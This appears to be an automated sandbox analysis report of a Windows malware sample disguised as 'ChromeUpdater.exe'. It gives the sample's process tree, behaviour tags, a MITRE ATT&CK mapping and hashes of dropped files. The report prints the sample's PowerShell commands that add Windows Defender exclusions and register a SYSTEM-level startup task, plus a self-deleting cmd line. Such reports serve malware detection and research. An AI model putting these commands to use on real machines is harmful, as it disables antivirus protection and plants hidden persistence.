- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#gdqir#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'ChromeUpdater' /tr '''C:\Program Files\Google\Chrome\ChromeUpdater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\ChromeUpdater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'ChromeUpdater' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "ChromeUpdater"2⤵
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\HQwlrLZylofyEqTIOcaDLwMgBreuXj.exe"2⤵
-
C:\Windows\System32\choice.exechoice /C Y /N /D Y /T 33⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#gdqir#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'ChromeUpdater' /tr '''C:\Program Files\Google\Chrome\ChromeUpdater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\ChromeUpdater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'ChromeUpdater' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe2⤵
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#gdqir#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'ChromeUpdater' /tr '''C:\Program Files\Google\Chrome\ChromeUpdater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\ChromeUpdater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'ChromeUpdater' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "ChromeUpdater"2⤵
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\iIejXplCjaCpPshklkztydsmNmHZJd.exe"2⤵
-
C:\Windows\System32\choice.exechoice /C Y /N /D Y /T 33⤵
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --string-annotations=is-enterprise-managed=no --field-trial-handle=4204,i,4538255413480930743,12957764444767653848,262144 --variations-seed-version --mojo-platform-channel-handle=3872 /prefetch:81⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --string-annotations=is-enterprise-managed=no --field-trial-handle=1308,i,4538255413480930743,12957764444767653848,262144 --variations-seed-version --mojo-platform-channel-handle=3912 /prefetch:81⤵
-
C:\Program Files\Google\Chrome\ChromeUpdater.exe"C:\Program Files\Google\Chrome\ChromeUpdater.exe"1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\ChromeUpdater.exe"C:\Program Files\Google\Chrome\ChromeUpdater.exe"1⤵
- Executes dropped EXE
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
133KB
MD5b789be46d520694943db87140ba6edb6
SHA13cc6c4ac64112a771ccd3235e313dcfcdc7a78d9
SHA256a6195edcc520035e9baf76f120fa62909ccea148a3a4596d81cda06e08fef962
SHA512648d70c844d4425c5a83882836ea65067e54eed181d355e950a267da5ad92343ef08a4cb4eccfe45aa8561be94ac686807c867d0e0cb438ddf5988e502923d34
-
Filesize
3KB
MD53eb3833f769dd890afc295b977eab4b4
SHA1e857649b037939602c72ad003e5d3698695f436f
SHA256c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485
SHA512c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72
-
Filesize
9.8MB
MD5f0d66591cc208003b04be406c2ea8420
SHA106458ca23059df3117666cb4a64dc2e26f9daf97
SHA256927f00ec370ff3aa74cb58bcd118e6198f1945fe7691f8f73f3feaa046dcfb5d
SHA512cf67d6eaac9bc848297df4b4f67ff6ef606161b1e9198af6a7f5430a240ca261503c23bb2c15b386a1b421181a399531a3735739a2b860beb18f5e8ea5c01c6a
-
Filesize
595KB
MD569b8138d0e9dd6b169043520330bceac
SHA1aabe9458e1751623e727fb775e923103a02afe7a
SHA25601825f4cb340163af8d9f803a31dc20c1e33404ced73e17dbf74896d7ec1c34b
SHA512fa135dfec349bc9a3fd8348b2a60352a01ef27d73505550291953b2274994aff88a614fd225b97c2824fa05e91580ac7dd2292065a99514d17f731c0711574d0
-
Filesize
1KB
MD5af1cc13f412ef37a00e668df293b1584
SHA18973b3e622f187fcf484a0eb9fa692bf3e2103cb
SHA256449c0c61734cf23f28ad05a7e528f55dd8a7c6ae7a723253707e5f73de187037
SHA51275d954ec8b98f804d068635875fac06e9594874f0f5d6e2ad9d6267285d1d4a1de6309009de9e2956c6477a888db648396f77a1a49b58287d2683b8214e7a3d3
-
Filesize
1KB
MD5b15f65d7cf4e7456abee410cd3d5497c
SHA1039679244c8dce47a650b007616b0549423f8da4
SHA256805e128a3c3200f8ceb354ba202900094ede4ba725a6554174636a74af00c6e4
SHA512d86d6c5d662182666ae09cf5b451fc440c53263f6925625b4781ef69b0456333749314484447cef5766863d2d7119ae03f7f54830870647824a5645f13c76ba4
-
Filesize
1KB
MD5c67441dfa09f61bca500bb43407c56b8
SHA15a56cf7cbeb48c109e2128c31b681fac3959157b
SHA25663082da456c124d0bc516d2161d1613db5f3008d903e4066d2c7b4e90b435f33
SHA512325de8b718b3a01df05e20e028c5882240e5fd2e96c771361b776312923ff178f27494a1f5249bf6d7365a99155eb8735a51366e85597008e6a10462e63ee0e8
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3KB
MD5060a9d492eb13b842aad02350b1e7284
SHA138be5b02a8db6bcc884ab9968cc6e968933cef0c
SHA256ef7848cafcc9287ec535cc0f98cd26257f03f4dea69e5f175cba8d7629b2075a
SHA512eade10f9e1099b16f7d2361c4a7d7ed23ca211a6b24fb786f9d348416ad5f998e6079ba82966f7e518fe22f80f4443c0026df6bc0812a349ddddc29b97618748
-
Filesize
201KB
MD5d4f11c9a6a07f2a9ec69bc367b9243be
SHA163a5efac9bee6e1fd7de45fe10b5768c8fd9e382
SHA2560dcf580f5f74465642419ae9f8c56ea2cb4116d8d2c37f4ee4e3dcd45c50f1f0
SHA51214d061b2b6b486f0294c2228dd5badfbcd3296be59777449239201bcf3095b0c89eafe9e88683b1c924022ee795aee8e5b6483046a08d824f74d1061aa7846e0
-
Filesize
3KB
MD56db666b8eea8c87bb44fc342dbda5fcb
SHA12536fb957e13fd2144e482970707286ca2625816
SHA256079b31aa6c5078c9a97ffc9cfd2778942fbb12359b05975eb18507b6a1f18438
SHA51288fcd3e8aaefc443b3fac3ec5a55762424a9d2211b051a36daad0c6be63f7a3f6f51d4be4e89189be044c7df6bcbded7eab6d3cba07a7a1458c48604b365579e
-
Filesize
1KB
MD5a4fe0be11fb007b21a2fafa6abe0bf6f
SHA1d0f2c0a5c7ee3491272101c3aaf7998bbb2fd22a
SHA256ec0577e1bf334d310a1a70fd57fd1e561a90bbdd34737daed674f01c36c0c8d2
SHA5121c51108e19f5a97acb7bba7c996c26a2715e3a4bb04b79c9afd718f8b8822bf906123e42eb1e40c88206bbce86b43546644d88794cc0de26126a38d9e27e01c0
-
Filesize
168KB
-
Filesize
168KB
-
Filesize
112KB
-
Filesize
724KB
-
Filesize
40KB
-
Filesize
136KB
-
Filesize
9.8MB
-
Filesize
9.8MB
-
Filesize
9.8MB
-
Filesize
9.8MB
-
Filesize
5.6MB
-
Filesize
4KB
-
Filesize
48KB
-
Filesize
7.7MB
-
Filesize
648KB
-
Filesize
7.7MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
8KB
-
Filesize
80KB
-
Filesize
10.8MB
-
Filesize
8KB
-
Filesize
10.8MB
-
Filesize
26.4MB
-
Filesize
10.8MB
-
Filesize
1.3MB
-
Filesize
10.8MB
-
Filesize
3.8MB
-
Filesize
9.8MB
-
Filesize
9.8MB
-
Filesize
7.9MB
-
Filesize
7.9MB
-
Filesize
7.9MB
-
Filesize
7.9MB
-
Filesize
128KB
-
Filesize
7.9MB
-
Filesize
112KB